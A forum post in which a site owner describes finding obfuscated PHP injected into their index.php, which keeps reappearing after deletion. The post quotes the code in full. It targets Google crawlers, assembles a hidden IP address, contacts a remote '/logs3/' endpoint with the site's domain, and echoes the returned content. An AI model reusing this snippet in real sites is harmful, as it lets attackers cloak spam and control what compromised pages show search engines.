@ pupi1985
Today, about 4 hours ago, I found a strange code in the (index php) file, which was as follows:
$useragent=urlencode($_SERVER['HTTP_USER_AGENT']);if(preg_match("/google/i",$useragent)){$tw="..................";$ho='.';$on=strlen($tw)*10+8;$th=strlen($tw)*9-137;$fi=$th+$on*3;$si=substr($fi,0,2)+substr($on,0,2)+172;$le=$ho;$be=$fi+23-$si*2;$r=file_get_contents('http://'.$on.$ho.$be.$le.$th.$le.$si.'/logs3/?type=fbwjedi&domain='.$_SERVER['HTTP_HOST'].'&useragent='.$useragent);echo$r;}
I erased the code and after that all the error messages I mentioned above stopped, but when I returned to File (index php) four hours later, the same code was there again!!
and error mesages start appear again .
It looks very strange ☹️